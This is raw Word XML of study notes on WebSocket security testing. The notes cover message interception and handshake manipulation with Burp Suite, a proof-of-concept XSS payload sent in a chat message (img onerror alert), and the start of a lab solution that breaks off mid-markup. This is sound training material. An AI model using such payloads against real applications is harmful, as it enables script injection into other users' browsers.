    <w:p w14:paraId="40CAAB15" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00D41B1D" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00D41B1D">
        <w:t xml:space="preserve">You can use Burp Proxy to intercept and modify WebSocket messages, as follows: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A120EF5" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00D41B1D" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41B1D">
        <w:t xml:space="preserve">Open Burp's browser. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D4AE09" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00D41B1D" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41B1D">
        <w:t xml:space="preserve">Browse to the application function that uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41B1D">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41B1D">
        <w:t xml:space="preserve">. You can determine that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41B1D">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41B1D">
        <w:t xml:space="preserve"> are being used by using the application and looking for entries appearing in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41B1D">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41B1D">
        <w:t xml:space="preserve"> history tab within Burp Proxy. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372571BA" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00D41B1D" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41B1D">
        <w:t xml:space="preserve">In the Intercept tab of Burp Proxy, ensure that interception is turned on. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3288B9F9" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00D41B1D" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41B1D">
        <w:t xml:space="preserve">When a WebSocket message is sent from the browser or server, it will be displayed in the Intercept tab for you to view or modify. Press the Forward button to forward the message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42535149" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00D41B1D" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41B1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11623078" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00D41B1D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">You can configure whether client-to-server or server-to-client messages are intercepted in Burp Proxy. Do this in the Settings dialog, in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:anchor="websocket-interception-rules" w:history="1">
        <w:r w:rsidRPr="00D41B1D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>WebSocket interception rules</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D41B1D">
        <w:t xml:space="preserve"> settings. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEA21FD" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="7726E22A" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003E3D2F" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3D2F">
        <w:t>Replaying and generating new WebSocket messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BF5DD2" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003E3D2F" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="003E3D2F">
        <w:t xml:space="preserve">As well as intercepting and modifying WebSocket messages on the fly, you can replay individual messages and generate new messages. You can do this using Burp Repeater: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7EFECF" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003E3D2F" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3D2F">
        <w:t xml:space="preserve">In Burp Proxy, select a message in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E3D2F">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E3D2F">
        <w:t xml:space="preserve"> history, or in the Intercept tab, and choose "Send to Repeater" from the context menu. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C02038B" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003E3D2F" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3D2F">
        <w:t xml:space="preserve">In Burp Repeater, you can now edit the message that was selected, and send it over and over. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744EDC1C" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003E3D2F" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3D2F">
        <w:t xml:space="preserve">You can enter a new message and send it in either direction, to the client or server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105F1EAD" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003E3D2F" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3D2F">
        <w:t xml:space="preserve">In the "History" panel within Burp Repeater, you can view the history of messages that have been transmitted over the WebSocket connection. This includes messages that you have generated in Burp Repeater, and also any that were generated by the browser or server via the same connection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C289A1B" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003E3D2F" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3D2F">
        <w:t xml:space="preserve">If you want to edit and resend any message in the history panel, you can do this by selecting the message and choosing "Edit and resend" from the context menu. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CACCDAF" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="7C5B7E2C" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00C5680A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00C5680A">
        <w:t>Manipulating WebSocket connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0468C0" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00C5680A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00C5680A">
        <w:t xml:space="preserve">As well as manipulating WebSocket messages, it is sometimes necessary to manipulate the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:anchor="how-are-websocket-connections-established" w:history="1">
        <w:r w:rsidRPr="00C5680A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>WebSocket handshake</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C5680A">
        <w:t xml:space="preserve"> that establishes the connection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3376E1" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00C5680A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00C5680A">
        <w:t xml:space="preserve">There are various situations in which manipulating the WebSocket handshake might be necessary: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A644326" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00C5680A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5680A">
        <w:t xml:space="preserve">It can enable you to reach more attack surface. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4370BF21" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00C5680A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5680A">
        <w:t xml:space="preserve">Some attacks might cause your connection to drop so you need to establish a new one. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576122EA" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00C5680A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5680A">
        <w:t xml:space="preserve">Tokens or other data in the original handshake request might be stale and need updating. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44854140" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00C5680A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00C5680A">
        <w:t xml:space="preserve">You can manipulate the WebSocket handshake using Burp Repeater: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472510B6" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00C5680A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5680A">
        <w:t xml:space="preserve">Send a WebSocket message to Burp Repeater as </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:anchor="replaying-and-generating-new-websocket-messages" w:history="1">
        <w:r w:rsidRPr="00C5680A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>already described</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C5680A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FEF580" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00C5680A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5680A">
        <w:t xml:space="preserve">In Burp Repeater, click on the pencil icon next to the WebSocket URL. This opens a wizard that lets you attach to an existing connected WebSocket, clone a connected WebSocket, or reconnect to a disconnected WebSocket. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171D121C" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00C5680A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5680A">
        <w:t xml:space="preserve">If you choose to clone a connected WebSocket or reconnect to a disconnected WebSocket, then the wizard will show full details of the WebSocket handshake request, which you can edit as required before the handshake is performed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514C7125" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00C5680A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5680A">
        <w:t xml:space="preserve">When you click "Connect", Burp will attempt to carry out the configured handshake and display the result. If a new WebSocket connection was successfully established, you can then use this to send new messages in Burp Repeater. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9D8263" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="41A00A06" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="33AD5DF9" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="1CFAF279" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C55ABF">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C55ABF">
        <w:t xml:space="preserve"> security vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6234DDB4" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00261E57" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00261E57">
        <w:t xml:space="preserve">In principle, practically any web security vulnerability might arise in relation to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00261E57">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00261E57">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212A22C0" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00261E57" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00261E57">
        <w:t xml:space="preserve">User-supplied input transmitted to the server might be processed in unsafe ways, leading to vulnerabilities such as SQL injection or XML external entity injection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6883E9DA" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00261E57" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00261E57">
        <w:t xml:space="preserve">Some blind vulnerabilities reached via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00261E57">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00261E57">
        <w:t xml:space="preserve"> might only be detectable using </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00261E57">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>out-of-band (OAST) techniques</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00261E57">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AF42B0" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00261E57" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00261E57">
        <w:t xml:space="preserve">If attacker-controlled data is transmitted via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00261E57">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00261E57">
        <w:t xml:space="preserve"> to other application users, then it might lead to XSS or other client-side vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099E2266" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="129A48F9" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0025232F" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="0025232F">
        <w:t>Manipulating WebSocket messages to exploit vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EE287C" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0025232F" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="0025232F">
        <w:t xml:space="preserve">The majority of input-based vulnerabilities affecting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0025232F">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0025232F">
        <w:t xml:space="preserve"> can be found and exploited by </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:anchor="intercepting-and-modifying-websocket-messages" w:history="1">
        <w:r w:rsidRPr="0025232F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>tampering with the contents of WebSocket messages</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0025232F">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22940772" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0025232F" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="0025232F">
        <w:t xml:space="preserve">For example, suppose a chat application uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0025232F">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0025232F">
        <w:t xml:space="preserve"> to send chat messages between the browser and the server. When a user types a chat message, a WebSocket message like the following is sent to the server: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EE778F" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0025232F" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="0025232F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0025232F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>message":"Hello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0025232F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> Carlos"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6D65F2" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0025232F" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="0025232F">
        <w:t xml:space="preserve">The contents of the message are transmitted (again via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0025232F">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0025232F">
        <w:t xml:space="preserve">) to another chat user, and rendered in the user's browser as follows: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ECA2D9" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0025232F" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="0025232F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;td&gt;Hello Carlos&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32301F92" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0025232F" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="0025232F">
        <w:t xml:space="preserve">In this situation, provided no other input processing or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0025232F">
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0025232F">
        <w:t xml:space="preserve"> are in play, an attacker can perform a proof-of-concept XSS attack by submitting the following WebSocket message: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B37FB7A" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00C55ABF" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="0025232F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>{"message":"&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0025232F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0025232F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0025232F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0025232F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0025232F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0025232F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0025232F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025232F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>1)'&gt;"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB7768D" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="001D50FF" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001D50FF">
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724BC32E" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="001D50FF" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="001D50FF">
        <w:t xml:space="preserve">APPRENTICE </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="001D50FF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Manipulating WebSocket messages to exploit vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001D50FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8BB23F" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00BC0E09" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00BC0E09">
        <w:t xml:space="preserve">This online shop has a live chat feature implemented using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC0E09">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC0E09">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D420284" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00BC0E09" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00BC0E09">
        <w:t xml:space="preserve">Chat messages that you submit are viewed by a support agent in real time. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38673D72" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00BC0E09" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00BC0E09">
        <w:t xml:space="preserve">To solve the lab, use a WebSocket message to trigger an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC0E09">
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC0E09">
        <w:t xml:space="preserve">) popup in the support agent's browser. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAD20CB" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCFF88A" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00523341" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00523341">
        <w:t xml:space="preserve">Click "Live chat" and send a chat message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247EBC72" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00523341" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00523341">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In Burp Proxy, go to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523341">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523341">
        <w:t xml:space="preserve"> history tab, and observe that the chat message has been sent via a WebSocket message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D103410" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00523341" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00523341">
        <w:t xml:space="preserve">Using the browser, send a new message containing a </w:t>
      </w:r>
      <w:r w:rsidRPr="00523341">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00523341">
        <w:t xml:space="preserve"> character. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AA0AB3" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00523341" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00523341">
        <w:t xml:space="preserve">In Burp Proxy, find the corresponding WebSocket message and observe that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00523341">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00523341">
        <w:t xml:space="preserve"> has been HTML-encoded by the client before sending. </w:t>
      </w:r>
      <w:r>
        <w:t>(&lt;&gt; -&gt; &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>; &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
